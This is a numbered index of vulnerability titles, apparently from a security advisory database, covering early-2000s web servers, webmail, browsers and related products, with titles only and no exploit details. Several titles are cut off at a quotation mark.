[12722] HP Color LaserJet 4550 administration interface cross-site scripting
[12706] Novell NetWare Enterprise Web Server PERL handler buffer overflow
[12664] WebCalendar "
[12660] Compaq Web Agent HTTP GET request denial of service
[12659] McAfee WebShield attachment can bypass content filter
[12629] RPC DCOM interface buffer overflow
[12628] WebJeff-Filemanager index.php3 directory traversal
[12594] Twilight Utilities Web Server HTTP GET request buffer overflow
[12567] BEA WebLogic could allow an attacker to gain access to the console
[12566] BEA WebLogic Operator could allow attacker to gain administrative privileges
[12565] BEA WebLogic Node Manager discloses keyfile password in plain text
[12542] Rockliffe MailSite stats Web page information disclosure
[12483] VisNetic WebSite path disclosure
[12477] PinkNet Web Server "
[12467] Abyss Web Server could allow an attacker to inject data into HTTP headers
[12466] Abyss Web Server HTTP GET request buffer overflow
[12456] WebBBS guestbook Name, Email, or Message fields cross-site scripting
[12448] BRS WebWeaver error page cross-site scripting
[12436] PHP-Nuke Web_Links module in modules.php script path disclosure
[12426] Compaq Web Agent SSI buffer overflow
[12425] WebAdmin user parameter buffer overflow
[12409] Snowblind Web Server "
[12406] Visnetic WebMail PHP source disclosure
[12385] webfs long URL buffer overflow
[12351] PHP-Nuke Sections, AvantGo, Surveys, Downloads, Reviews, and Web_Links modules SQL injection
[12333] noweb noroff script temporary file symlink
[12331] Aiglon web server path disclosure
[12307] SLwebmail3 multiple requests denial of service
[12296] Forum Web Server message cross-site scripting
[12295] Forums Web Server "
[12294] Forum Web Server stores password and username in User.ini in plain text
[12293] Forum Web Server stores password and username in plain text
[12287] WebBBS multiple denial of service
[12286] Snowblind Web Server HTTP GET request buffer overflow
[12285] Snowblind Web Server HTTP request denial of service
[12284] Snowblind Web Server "
[12283] silentThought Simple Web Server "
[12280] MaxWebPortal password reset
[12279] MaxWebPortal database file access
[12278] MaxWebPortal could allow an attacker to modify form fields
[12277] MaxWebPortal search.asp cross-site scripting
[12269] Baby Web Server "
[12265] Baby Web Server multiple connections denial of service
[12232] Nuca WebServer "
[12222] Synkron.web search module cross-site scripting
[12209] Novell iChain could allow unauthorized access to a protected Web page
[12191] D-Link administrative Web page denial of service
[12167] Pi3Web Server ?SortName buffer overflow
[12145] PHPWebChat users.php cross-site scripting
[12144] PHPWebChat multiple scripts path disclosure
[12142] PHPWebChat users.php path disclosure
[12135] WebStores 2000 browse_item_details.asp SQL injection
[12120] Webfroot Shoutbox $config file include
[12111] Webfroot Shoutbox "
[12107] BRS WebWeaver HTTP HEAD and HTTP POST request buffer overflow
[12100] Microsoft IIS long WebDAV requests containing XML denial of service
[11995] Web Server 4D HTTP GET request buffer overflow
[11991] BEA WebLogic information disclosure
[11990] BEA WebLogic CredentialMapper stores passwords in plain text
[11989] BEA WebLogic JDBCConnectionPoolRuntimeMBean password displayed in plain text
[11985] BEA WebLogic SSL CA-signed certificate spoofing
[11984] PHP-Nuke Web_Links and Downloads modules SQL injection
[11964] Multiple vendor Web browsers fail to properly validate digital certificates
[11963] SLwebmail3 invalid request path disclosure
[11962] SLwebmail3 ShowGodLog.dll unauthorized file access
[11961] SLwebmail3 ISAPI DLL buffer overflows
[11952] webcamXP multiple cross-site scripting
[11926] Web Protector uses weak encryption algorithm
[11891] Xeneo Web Server GET request denial of service
[11889] Pi3Web GET request buffer overflow
[11887] Xeneo Web Server packet with large payload buffer overflow
[11875] WebAdmin WebAdmin.dll could allow an attacker to view files
[11874] WebAdmin WebAdmin.dll path disclosure
[11856] BRS WebWeaver RETR command denial of service
[11819] Web Wiz Forums administrative password is stored in plain text
[11809] Twilight Utilities Web Server HTTP GET denial of service
[11800] iWeb Mini Web Server GET request directory traversal
[11792] WebGUI HTTP request denial of service
[11780] Web Wiz Site News administrative password is stored in plain text
[11779] MailMax/WEB installation path stored in cookie
[11765] WebC web.emf error message file format string
[11764] WebC environment variable buffer overflow
[11763] WebC configuration file symlink attack
[11760] WebC Webc.cgi long script name URL request buffer overflow
[11746] BEA WebLogic SSIServlet could allow an attacker to view source code
[11721] Multiple vendor Web browsers LiveConnect malformed JavaScript page denial of service
[11718] Abyss Web Server malformed HTTP GET request denial of service
[11716] DeskNow Web Mail transmits password in plain text
[11697] BEA WebLogic HTTP GET request information disclosure
[11686] BRS WebWeaver testcgi.exe information disclosure
[11682] BRS WebWeaver users.ini weak password encryption
[11681] BRS WebWeaver overly long HTTP request denial of service
[11680] BRS WebWeaver CD command denial of service
[11661] Beanwebb Guestbook could allow unauthorized administrative access
[11660] Beanwebb Guestbook add.php cross-site scripting
[11625] PHP WEB CHAT register.php, login.php, and profile.php cross-site scripting
[11587] XOOPS $xoopsOption Web root path disclosure
[11558] BEA WebLogic insecure modify permission allows deletion of empty sub-contexts
[11557] MyABraCaDaWeb index.php ma_kw cross-site scripting
[11556] MyABraCaDaWeb index.php could disclose Web root path
[11555] BEA WebLogic Servers Web application re-authentication bypass
[11554] BEA WebLogic Servers internal WebLogic servlet unauthorized access
[11539] Logan Pro and WebLog Expert HTTP header HTML injection
[11537] Microsoft IIS WebDAV service is running on the system
[11534] iPlanet Web Server hidden log entry
[11533] Microsoft IIS WebDAV long request buffer overflow
[11532] Multiple vendor Web servers and Web log analyzers cross-site scripting
[11525] IBM Lotus Domino and Notes Client Web Retriever buffer overflow
[11476] Forum Web Server subject and message fields cross-site scripting
[11475] Forum Web Server upload directory traversal
[11471] Dr. Web file name buffer overflow
[11459] TYPO3 Web root directory exposes sensitive files
[11451] WebChat defines.php file include
[11443] WEB-ERP logicworks.ini unauthorized configuration access
[11437] phpWebFileManager file.php directory traversal
[11394] Novell GroupWise WebAccess script execution
[11390] Webmin and Usermin session ID spoofing root access
[11311] IBM Lotus Domino Web server "
[11267] nPULSE vulnerability in Web server
[11253] BEA WebLogic custom file could allow an attacker to gain SYSTEM user privileges
[11245] IBM WebSphere uses weak encryption algorithm to store passwords in an exported XML file
[11226] BEA WebLogic default servlet could allow an attacker to browse file contents
[11225] BEA Tuxedo and WebLogic TDomain gateway authentication bypass
[11223] BEA WebLogic SNMP Agent could disclose system password
[11222] BEA WebLogic RMI could allow access to administrative configuration settings
[11221] BEA WebLogic clustered environment race condition session sharing
[11220] BEA WebLogic keystores store plaintext passwords
[11219] BEA WebLogic CSR Generator could create insecure private keys
[11218] BEA WebLogic Node Manager could disclose WebLogic Server password
[11200] Compaq Web Agent Service session hijacking
[11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
[11195] Apache Tomcat web.xml could be used to read files
[11172] simple web counter (swc) ctr parameter buffer overflow
[11149] Multiple vendor Web servers HTTP TRACE method information disclosure
[11103] RomPager embedded Web server cross-site scripting
[11095] Shambala Web server username and password denial of service attack
[11064] WebCollection Plus forward slash (/) directory traversal
[11058] IBM Lotus Domino Web server authentication buffer overflow
[11057] BEA WebLogic ResourceAllocationException could disclose system password
[11044] vBB (versatileBulletinBoard) could allow unauthorized webmaster privileges
[11034] BRS WebWeaver mkdir path disclosure
[11033] BRS WebWeaver FTP mkdir directory traversal
[11026] WebIntelligence could allow session hijacking
[11021] GeneWeb URL request containing absolute path information disclosure
[11003] H-Sphere WebShell flist() buffer overflow
[11002] H-Sphere WebShell diskusage buffer overflow
[11001] H-Sphere WebShell encodeFileName() command execution
[10999] H-Sphere WebShell CGI::readFile() function buffer overflow
[10972] iCal could disclose physical path of the Web server
[10949] WEBppliance alias feature could allow an attacker to obtain sensitive information
[10948] LocalWEB2000 users.lst file stores passwords in plain text
[10941] web-cyradm IMAP daemon not running denial of service
[10930] Oracle9i Application Server WEB-INF directory is accessible
[10914] PHP-Nuke Web Mail module could allow an attacker to execute PHP commands
[10904] Open WebMail Perl scripts could be used to execute commands
[10902] OpenRatings add.phtml Web page SQL injection
[10895] SHOUTcast Server Web administrative password is stored in plain text
[10878] Infinite WebMail logger.cgi script cross-site scripting
[10867] BEA WebLogic Xerces XML DTD parsing denial of service
[10863] Webshots Desktop screensaver lock can be bypassed
[10852] VisNetic Website HTTP_REFERER header cross-site scripting
[10840] VisNetic Website URL request denial of service
[10826] Adobe Macromedia ColdFusion and JRun Web services SOAP denial of service
[10808] Netscape/iPlanet/Sun ONE Web Server log file script execution
[10805] Enceladus Server Suite Web server "
[10782] WebReflex "
[10741] McAfee VirusScan WebScanX.exe module malicious DLL execution
[10730] WsMp3 Web_server multiple buffer overflows
[10729] Webster HTTP Server path name cross-site scripting
[10728] Webster HTTP Server "
[10727] Webster HTTP Server long URL buffer overflow
[10724] pWins Web server "
[10693] iPlanet (Sun ONE) Web Server admin Perl scripts open() command execution
[10692] iPlanet (Sun ONE) Web Server admin error log cross-site scripting
[10684] Open WebMail could disclose sensitive information
[10643] Courier sqwebmail mail transport agent (MTA) fails to properly enforce permissions
[10638] Savant Web Server HTTP Host header buffer overflow
[10628] IBM HTTP Server could disclose the Web root path
[10606] XOOPS WebChat module SQL injection
[10601] INweb Mail Server HELO command buffer overflow
[10600] Sun Solaris network interface TCP denial of service
[10563] Simple Web Server could allow an attacker to access password protected files
[10558] PortalApp users could gain elevated privileges on the Web portal
[10534] Xeneo Web Server PHP version malformed HTTP request denial of service
[10514] Linksys EtherFast gozila.cgi remote management interface denial of service
[10503] Microsoft IIS WebDAV memory allocation denial of service
[10501] Microsoft IIS administrative Web pages cross-site scripting
[10499] Apache HTTP Server WebDAV HTTP POST view source
[10467] BRS WebWeaver could allow an attacker to access password protected files
[10461] KF Web Server malformed HTTP header buffer overflow
[10454] IBM Web Traffic Express (WTE) HTTP header injection cross-site scripting
[10453] IBM Web Traffic Express (WTE) HTML tag cross-site scripting
[10452] IBM Web Traffic Express (WTE) /cgi-bin/helpout.exe denial of service
[10447] Web Server 4 Everyone HTTP "
[10429] IBM Lotus Domino Web request truncation allows remote administrative access
[10392] BEA WebLogic security policy is ignored when migrating certain applications
[10391] PlanetWeb long URL buffer overflow
[10390] IBM AIX WebSecure (DSFWEB) has insecure configuration scripts
[10388] Microsoft SQL Server Web tasks could allow elevated privileges
[10381] Webmin ships with identical SSL keys
[10373] Web Server 4 Everyone hexadecimal URL encoded forward-slash directory traversal
[10372] Web Server 4 Everyone long file name request buffer overflow
[10367] SimpleWebServer overly long URL denial of service
[10364] Simple, secure webserver malformed URL denial of service
[10363] Simple, secure webserver could disclose network topology
[10360] Polycom ViaVideo Web server multiple incomplete requests denial of service
[10359] Polycom ViaVideo Web server GET request buffer overflow
[10349] MyWebServer long HTTP denial of service
[10322] SurfControl SuperScout Email Filter Administrative Web server GET denial of service
[10321] SurfControl SuperScout Email Filter Administrative Web server empty Content-Length denial of service
[10320] SurfControl SuperScout Email Filter Administrative Web server plaintext passwords and usernames
[10291] BEA WebLogic Servlet and EJB security restriction removal
[10284] Oracle9i Application Server Web Cache Manager tool denial of service
[10256] phpWebSite HTML IMG tags article.php script cross-site scripting
[10248] SurfControl SuperScout Web Filter information retrieval
[10247] SurfControl SuperScout Web Filter weak encryption algorithm
[10245] SurfControl SuperScout Web Filter SQL injection
[10244] SurfControl SuperScout Web Filter "
[10242] SurfControl SuperScout Web Filter GET request denial of service
[10221] BEA WebLogic HTTP response could disclose sensitive information to unintended users
[10207] phpWebSite multiple instances could allow an attacker to gain administrative privileges
[10205] EMU Webmail emumail.cgi address cross-site scripting
[10204] EMU Webmail could disclose the Web root path
[10198] Web Server 4D plaintext passwords and usernames
[10191] acWEB Web server cross-site scripting
[10190] acWEB Web server DOS device name request denial of service
[10189] Null Webmail wmprintf() format string
[10187] Oracle Web Cache administrative pages buffer overflow
[10182] HAMweather hwadmin.cgi script allows Web administration access
[10168] Dinos Webserver URL encoded "
[10167] HP WEBES Compaq Analyze service allows unauthorized file access
[10164] phpWebSite modsecurity.php could be used to include remote PHP files
[10140] IBM WebSphere HTTP Host: header buffer overflow
[10136] DB4Web can be used to make TCP connections to other systems
[10124] PlanetWeb GET request long URL buffer overflow
[10123] DB4Web db4web_c directory traversal
[10104] Savant Web server could allow an attacker to access protected folders
[10103] Savant Web server negative Content-Length denial of service
[10102] Savant Web server cgitest.exe buffer overflow can crash the server
[10076] Savant Web server long URL buffer overflow
[10072] SWS Web Server recv() memory overwrite
[10071] SWS Web Server invalid file request denial of service
[10070] SWS Web Server "
[10063] Wordtrans wordtrans-web wordtrans.php could be used to execute malicious code
[10059] Wordtrans wordtrans-web wordtrans.php cross-site scripting
[10052] Webmin Printer Administration shell command execution
[10051] Web Server 4 Everyone hexadecimal URL encoded directory traversal
[10025] Cisco VPN 3000 series concentrators HTML interface denial of service
[10024] Cisco VPN 3000 series concentrators could allow unauthorized access to Web pages
[10019] Cisco VPN 3000 series concentrators administrative Web page contains plaintext user passwords
[10005] SWS Web Server string without a newline (\n) could cause a denial of service
[9983] Webmin remote_foreign_require and remote_foreign_call CGI improperly validates user permissions
[9957] Abyss Web Server allows unauthorized admin console access
[9956] Abyss Web Server file disclosure when the plus (+) character is appended to an HTTP request
[9941] Abyss Web Server allows directory traversal using specially-crafted GET request
[9940] Abyss Web Server allows directory traversal using hexadecimal URL encoded HTTP request
[9931] Microsoft Office Web Components MS02-044 patch is not installed on the system
[9925] WebEasyMail POP3 username/password brute force attack
[9924] WebEasyMail SMTP server format string attack results in denial of service
[9905] Kerio WebServer Webmail cross-site scripting
[9884] GoAhead WebServer malformed long URL buffer overflow
[9867] Novell NetWare Web Search Server cross-site scripting
[9866] IceWarp Web Mail address book user name cross-site scripting
[9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
[9862] MyWebServer invalid directory path could disclose path to Web root directory
[9861] MyWebServer long HTTP request cross-site scripting
[9859] MyWebServer search request buffer overflow
[9841] Oracle9i Application Server Web Cache password is not encrypted
[9817] Web Shop Manager search box could allow remote command execution
[9812] Falcon Web Server 301 or 404 error message cross-site scripting
[9807] IceWarp Web Mail static session ID
[9799] iPlanet (Sun ONE) Web Server chunked transfer encoding heap buffer overflow
[9784] Microsoft Content Management Server (MCMS) Web authoring file execution
[9782] Trackeur de visiteurs could allow an attacker to disable Web usage tracking
[9780] PhpWebGallery cookie modification could allow administrative access
[9767] 602Pro LAN SUITE 2002 Web server device request denial of service
[9757] Multiple vendor Web browser FTP view cross-site scripting
[9732] Microsoft Office Web Components (OWC) could allow a remote attacker to execute code
[9730] Squid Web Proxy Cache is running on the system
[9726] Multiple vendor Web browsers JavaScript "
[9722] Ipswitch IMail Web Calendaring (iwebcal) empty Content-Length POST denial of service
[9721] Abyss Web Server slash ("
[9679] Ipswitch IMail Web Messaging daemon buffer overflow
[9676] Linux kernel ifconfig could fail to show that a network interface is in promiscuous mode
[9631] Java Web Start .jnlp file could allow remote code execution
[9615] IMHO Webmail module for Roxen WebServer could allow mail session hijacking
[9590] Resin DOS device request could disclose path to Web root directory
[9586] Jigsaw /aux request could disclose path to Web root directory
[9550] Xeneo Web Server (WebMan) "
[9540] ActivWebserver HTML tag cross-site scripting
[9537] Microsoft Internet Explorer WebBrowser control OBJECT property could allow cross domain scripting
[9519] GoAhead WebServer hexadecimal URL encoded "
[9518] GoAhead WebServer 404 message cross-site scripting
[9517] iPlanet Web Server search engine NS-query-pat file viewing
[9506] iPlanet Web Server search enabled NS-rel-doc-name buffer overflow
[9503] Webresolve long hostname buffer overflow
[9501] MyWebServer long URL buffer overflow
[9500] KF Web Server NULL byte character could allow an attacker to view directory contents
[9486] BEA WebLogic Server race condition denial of service
[9482] Squid Web Proxy Cache msnt_auth buffer overflow
[9481] Squid Web Proxy Cache multiple FTP directory buffer overflows
[9480] Squid Web Proxy Cache multiple gopher buffer overflows
[9479] Squid Web Proxy Cache FTP data channels could allow data injection or data hijacking
[9478] Squid Web Proxy Cache authentication header forwarding information disclosure
[9446] Multiple vendor /WEB-INF./ could allow an attacker to retrieve arbitrary files
[9435] Xitami Web server errors.gsl cross-site scripting
[9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
[9387] BasiliX Webmail allows malicious user to view attachments in the /tmp/BasiliX folder
[9386] BasiliX Webmail allows remote attacker to obtain sensitive files
[9385] BasiliX Webmail vulnerable to SQL injection
[9384] BasiliX Webmail subject and message headers allow cross-site scripting
[9378] WebBBS followup allows remote attacker to execute commands
[9377] Cisco ONS15454 TCC LAN interface denial of service
[9373] webMathematica "
[9371] NetGear RP114 Web Safe Router allows external access by default
[9353] Cisco Secure ACS Web server component cross-site scripting
[9343] Mozilla and Netscape Web browsers POP3 denial of service
[9312] zenTrack invalid ticket ID could disclose the path to the Web root directory
[9296] WebCalendar .inc files could be used to obtain sensitive information
[9287] Links Web browser large PNG image buffer overflow
[9285] TeeKai's Forum cookie manipulation could allow administrative access to the Web forum
[9225] Shambala Web server malformed GET request denial of service
[9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
[9179] Falcon Web Server could allow an attacker to access password protected files
[9165] LocalWEB2000 could allow an attacker to bypass protection and view restricted files
[9149] Xitami Web server CGI errors could reveal source code
[9147] Deerfield.com WebSite Pro 8.3 short file name source disclosure
[9118] Red Hat Stronghold Secure Web server request for sample script could reveal path to Web root
[9099] Seminole Webserver invalid HTTP request heap corruption
[9098] Seminole Webserver empty request denial of service
[9084] Microsoft Internet Explorer NetBIOS connection could allow rendering of Web sites with incorrect security zone
[9071] NOCC Webmail client cross-site scripting
[9070] DevBB Web forum software install.php could allow an attacker to gain administrative access
[9037] Webmin and Usermin could allow an attacker to spoof a session ID
[9036] Webmin and Usermin authentication page error cross-site scripting
[9028] Lidek Webserver "
[9004] askSam Web Publisher path disclosure
[9003] askSam Web Publisher cross-site scripting
[8996] 4D Web Server username and password buffer overflow
[8977] Mozilla, Netscape, and Galeon Web browsers Cascading Style-Sheets (CSS) could allow an attacker to determine a file's existence
[8967] BEA WebLogic malformed URL request could reveal JSP source code
[8966] BEA WebLogic Server DOS device %00 request denial of service
[8965] BEA WebLogic Server malformed request could reveal full path to root directory
[8922] IPC@CHIP Web server root directory is set to the system root
[8865] WebTrends Reporting Center profile variable real path disclosure
[8864] WebTrends Reporting Center long string buffer overflow
[8862] Microsoft BackOffice Server allows attacker to bypass authentication for Web administration pages
[8861] Web+ long cookie buffer overflow
[8849] StepWeb Search (SWS) insecure admin page
[8837] Webalizer reverse DNS lookup buffer overflow
[8836] EMU Webmail allows local attacker to execute arbitrary programs using a malicious HTTP Host value
[8827] IBM Informix Web Datablade Module HTML decoding of SQL Query
[8826] IBM Informix Web Datablade Module allows SQL injection attack
[8825] IBM Tivoli Storage Manager Web server port 1580 login buffer overflow
[8816] Microsoft Internet Explorer does not clear local Web cache
[8805] Abyss Web Server retrieves configuration file using hexadecimal URL encoded "
[8768] Horde IMP invalid PHP file request could disclose the Web root path
[8766] EMU Webmail emumail.cgi allows remote attacker to view arbitrary files
[8650] Instant Web Mail could allow the execution of POP3 commands
[8630] jo! Web server JSP error message cross-site scripting
[8628] Squid Web Proxy Cache DNS reply denial of service
[8624] WebSight Directory System cross-site scripting
[8611] Microsoft Outlook IFRAME tags allows malicious Web sites to embed URLs
[8606] HP Praesidium Webproxy could allow unauthorized remote access
[8598] Webmin stores plain text usernames and passwords in the /etc/webmin/servers directory
[8596] Webmin function allows local attacker to execute script code
[8595] Webmin uses insecure permissions for some directories
[8535] Web site is being copied
[8507] WebEvent first time script could allow unauthorized administrative access
[8483] Java Web Start could allow an attacker to access restricted resources
[8472] ARSC non-existent language file reveals Web root path information
[8471] Microsoft Internet Explorer dotless IP variant could allow rendering of Web sites with incorrect Security Zone
[8459] Foundry Networks ServerIron Web switches incomplete URL decoding in pattern matching could reveal source code
[8446] Web+ long WML script request buffer overflow
[8425] Trend Micro InterScan VirusWall could allow virus infected Web pages to bypass the HTTP proxy filtering
[8418] Excite for Web Servers password is weakly encrypted
[8417] Excite for Web Servers password replay attack
[8415] Tunnel interface exists on the router
[8374] WebCart directories and files are readable by default
[8361] Web+ webpsvc.exe buffer overflow
[8355] Oracle Web Listener could allow a remote attacker to bypass restrictions using hexadecimal URL encoded characters
[8348] Multiple Web browsers for Mac OS and Mac OS X could allow automatic file downloads
[8298] Worldgroup Web server long GET request buffer overflow
[8285] iPlanet Web Server "
[8258] Squid Web Proxy Cache ftpBuildTitleUrl() function buffer overflow
[8255] NetWin WebNEWS CGI has default user accounts
[8250] ScriptEase: Mini WebServer malformed GET requests denial of service
[8249] Essentia Web Server long request denial of service
[8248] Essentia Web Server "
[8236] ScriptEase: Mini WebServer long HTTP request denial of service
[8233] Dinos Webserver log tag buffer overflow
[8229] ICQ 99a built-in Web server could allow an attacker to determine the existence of files on the system
[8221] Slashcode Web sites allow cross-site scripting
[8220] NetWin WebNEWS CGI "
[8215] Phusion Web Server long GET buffer overflow
[8213] Phusion Web Server long URL denial of service
[8212] Phusion Web server "
[8208] Lasso Web Data Engine long request denial of service
[8189] Falcon Web Server could allow an attacker to access protected virtual directories
[8093] PHPWebThings allows remote attacker to call core/main.php script directly
[8070] Mrtg/RRD 14all.cgi could reveal the path to the Web root directory
[8027] Mandrake Linux default Apache configuration has remote management interface enabled
[7977] Caldera UnixWare and OpenUnix Webtop cgi scripts command execution
[7973] Mozilla and Netscape Web browsers could allow an attacker to steal cookie-based authentication information
[7960] Cyberstop Easy Webserver long URL request denial of service
[7959] Cyberstop Easy Webserver MS-DOS device name request denial of service
[7931] hellbent Web server hellbent.prefs file could allow an attacker to obtain sensitive information
[7930] hellbent Web server relative Web root path disclosure
[7880] Pi3Web HTTP Server long CGI parameter buffer overflow
[7879] Web Server 4D/eCommerce long URL denial of service
[7878] Web Server 4D/eCommerce "
[7853] Dinos Webserver "
[7845] Netscape Enterprise Server and iPlanet Web Server ?wp-force-auth command brute force attack
[7843] Multiple Web browsers support SSL without validating certificates
[7842] Netscape Enterprise Server and iPlanet Web Server ?wp-html-rend command denial of service
[7808] BEA WebLogic DOS device JSP request denial of service
[7790] BOOZT! Web admin long name buffer overflow
[7786] Savant Web server long file parameter value buffer overflow
[7779] Anti-Web HTTPD (awhttpd) tpbuf (/) buffer overflow
[7778] Anti-Web HTTPD (awhttpd) denial of service if F: is removed from the Anti-Web script
[7777] Anti-Web HTTPD (awhttpd) invalid file retrieval denial of service
[7773] ActivePerl could reveal path to the Web root
[7768] Oracle9iAS Web Cache stores admin password in $ORACLE_HOME/webcache/webcache.xml
[7766] Oracle9iAS Web Cache allows an attacker to gain privileges using webcached daemon
[7765] Oracle9iAS Web Cache null characters denial of service
[7726] ScriptEase:Webserver Edition sample script Novell NetWare "
[7716] IBM Tivoli SecureWay Policy Director WebSEAL proxy denial of service
[7711] Webmin "
[7709] Microsoft Windows multiple vendor Web browser high image count denial of service
[7698] IBM WebSphere allows an attacker to view plaintext root password in "
[7697] Citrix ICA Client allows a malicious Web site operator to download arbitrary files on the system to gain elevated privileges
[7677] Allaire JRun could allow an attacker to access JSP files in the WEB-INF and META-INF directories
[7674] Kebi Webmail administrative directory is accessible
[7673] XFree86 buffer overflow using the Konqueror Web browser and file manager
[7660] easyNews PHP script could reveal the path to Web root
[7650] ValiCert EVA Admin user interface can allow injected script to be executed
[7637] McAfee Webshield SMTP specially-malformed MIME encoded file attachments could bypass virus scanner
[7623] Allaire JRun could allow remote attackers to view Web root directory
[7600] Xitami Webserver stores admin password in plain text in "
[7593] Netscape Web browser for Mac OS prints passwords in plain text
[7585] IBM Informix SQL Web DataBlade module "
[7582] Red Hat Stronghold Secure Web Server could allow an attacker to obtain sensitive server information
[7565] WebBrowser ActiveX control in Internet Explorer allows Web site operator to view clipboard contents
[7541] thttpd and mini_httpd Web server allows remote attacker to bypass permissions
[7529] Website Pro args.bat and args.cmd files allows attackers to execute arbitrary commands
[7525] ISA Web Proxy service failed
[7524] ISA Web Proxy service stopped
[7518] ISA Server packet filter did not detect an external interface
[7516] ISA Server packet filter interface bind failure
[7492] Ping to multicast address using loopback interface denial of service
[7479] Wireless client successfully obtained Web access by HTTP
[7458] Web Crossing WebX could allow session hijacking
[7426] Microsoft Internet Explorer may expose authentication information to redirected Web sites
[7419] Apache Web Server could allow remote attackers to overwrite .log files
[7404] Linux WebTool inherited privileges
[7399] RSA SecurID WebID debug mode allows attacker to gain information
[7397] RSA SecurID WebID unicode directory traversal
[7363] Apache Web Server hidden HTTP requests
[7351] Webalizer allows an attacker to inject HTML tags into search keywords
[7350] Webalizer allows an attacker to inject HTML tags into host names
[7315] WebCart Webcart.cgi allows command execution
[7310] Oracle9i Application Server administration interface port denial of service
[7308] Oracle9i Application Server Web service long string denial of service
[7307] Oracle9i Application Server Web services exits process unexpectedly
[7306] Oracle9i Application Server Web services buffer overflow
[7287] Novell GroupWise Web front-end directory traversal could allow arbitrary file retrieval
[7279] Ipswitch IMail Web Calendaring buffer overflow
[7273] Ipswitch IMail Web Messaging Service can be used to change other user's information
[7258] Microsoft Internet Explorer dotless IP could allow rendering of Web sites with incorrect Security Zone
[7252] Third Voice Web annotation utility cross-site scripting
[7216] Webmin brute force password attack
[7205] Alexis Server Web access sends sensitive information in plain text
[7189] Compaq Web-enabled Management Software buffer overflow
[7174] Oracle Web server misconfiguration could allow an attacker to gain root privileges
[7159] Xcache may return full path to requested pages on Web server
[7157] Squid Web Proxy mkdir-only PUT request denial of service
[7153] IBM WebSphere predictable sequence numbers could allow unauthorized access
[7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
[7103] Apple Mac OS X used with Apache Web server could disclose directory contents
[7097] Wang/Kodak ActiveX controls can be used by a Web site operator to take action on a visiting user's system
[7033] Respondus for WebCT uses weak encryption
[7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
[7010] 4D Web Server directory traversal could allow a remote attacker to view files
[6993] Webridge PX Application Suite server could reveal server information in error messages
[6982] Microsoft IIS WebDAV long invalid request denial of service
[6975] SIX-webboard "
[6949] Linksys EtherFast routers could reveal passwords in HTML source of administrative interface
[6873] BasiliX Webmail allows remote attackers to view arbitrary files
[6790] ColdFusion Web publish example script can be used to upload and execute files
[6788] Trend Micro InterScan WebManager HttpSave.dll buffer overflow
[6786] Citrix NFuse Web root path disclosure
[6771] vWebServer multiple long URL requests denial of service
[6770] vWebServer MS-DOS device name denial of service
[6769] vWebServer could reveal ASP source code
[6759] Apple Mac OS Personal Web Sharing denial of service
[6753] Gnatsweb help_file parameter could be used to execute commands with elevated privileges
[6725] w3m Web browser malformed MIME header buffer overflow
[6723] Tarantella server ttawebtop.cgi script could allow remote attackers to view arbitrary files
[6697] HP VirtualVault with iPlanet Web Server allows data corruption
[6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
[6685] WebStore ws_mail.cgi command execution
[6653] WebBoard "
[6651] Microsoft ISA Server Web Proxy denial of service caused by embedded code in HTML email
[6639] WebTrends Unicode space reveals script source code
[6627] Webmin could allow attackers to gain sensitive information
[6619] TWIG Webmail SQL query modification
[6555] Microsoft Internet Explorer with certificate CRL checking enabled could allow Web site spoofing
[6554] iPlanet Netscape Enterprise Web Publisher URI handling buffer overflow
[6549] Microsoft IIS WebDAV lock method memory leak can cause a denial of service
[6536] Apple Mac OS Personal Web Sharing denial of service
[6527] Apache Web Server for Windows and OS2 denial of service
[6518] Microsoft Windows Index Server could allow attackers to view files on the Web server
[6487] Linux SAP Web Application Server may allow execution of arbitrary code
[6486] WebCalendar allows remote user to execute commands
[6477] BRS WebWeaver FTP path disclosure
[6476] BRS WebWeaver Web server "
[6474] ICQ Web Front plugin denial of service
[6468] NetCruiser Web Server could reveal directory path
[6466] WebXQ "
[6465] Cisco Aironet Web Configuration in use
[6464] 3Com AirConnect System Setup Web Access
[6463] 3Com AirConnect Special Functions Web Access
[6462] 3Com AirConnect SNMP Setup Web Access
[6461] 3Com AirConnect Security Setup Web Access
[6460] 3Com AirConnect RF Setup Web Access
[6459] 3Com AirConnect Modem Setup Web Access
[6458] 3Com AirConnect Firmware Web Access
[6457] 3Com AirConnect Filtering Setup Web Access
[6456] 3Com AirConnect Easy Setup Web Access
[6451] Perl Web Server directory traversal
[6435] IBM WebSphere plug-in could allow attackers to view JSP source
[6405] Microsoft Data Access Component Internet Publishing Provider allows WebDAV access
[6400] GoAhead WebServer "
[6389] Xitami Web server denial of service
[6385] processit.pl CGI could allow attackers to view sensitive information about the Web server
[6383] Microsoft ISA Server Web Proxy denial of service
[6372] IBM WebSphere CGI macro denial of service
[6371] Net.Commerce package in IBM WebSphere reveals installation path
[6351] IBM Lotus Domino Web Server URL parsing denial of service
[6350] IBM Lotus Domino Web Server CORBA denial of service
[6349] IBM Lotus Domino Web Server Unicode denial of service
[6348] IBM Lotus Domino Web Server DOS device denial of service
[6347] IBM Lotus Domino Web Server HTTP header denial of service
[6340] TalkBack CGI script could allow remote attackers to read files on the Web server
[6315] BEA WebLogic may reveal JSP source code
[6300] SurfControl SuperScout Web Filter bypass filtering rules
[6295] WebSite Professional remote manager service denial of service
[6283] BEA WebLogic Server could allow attackers to browse Web directories
[6264] Compaq Web-enabled management software could allow users to bypass proxy settings
[6240] MDaemon WorldClient Web services denial of service
[6237] vBulletin PHP Web forum allows attackers to gain elevated privileges
[6236] 3Com AirConnect Access Point Web server may reveal system security information
[6214] WEBsweeper HTTP request denial of service
[6205] Microsoft IIS WebDAV denial of service
[6200] Cisco Aironet Web access allows remote attacker to view/modify configuration
[6199] APC Web/SNMP Management Card Telnet denial of service
[6187] Fastream FTP++ Client allows user to download files outside of Web root directory
[6164] Orange Web Server "
[6163] WebReflex Web server HTTP GET request denial of service
[6132] Moby's NetSuite Web server buffer overflow
[6121] WEBactive HTTP Server directory traversal
[6118] Resin Web server directory traversal
[6114] Pi3Web reveals physical path of server
[6113] Pi3Web ISAPI tstisapi.dll denial of service
[6110] HP VirtualVault iPlanet Web Server denial of service
[6102] WebPALS Library System CGI script could allow attackers to view unauthorized files or execute commands
[6101] WebSPIRS CGI could allow an attacker to view unauthorized files
[6100] WebPage.cgi allows attackers to view sensitive information
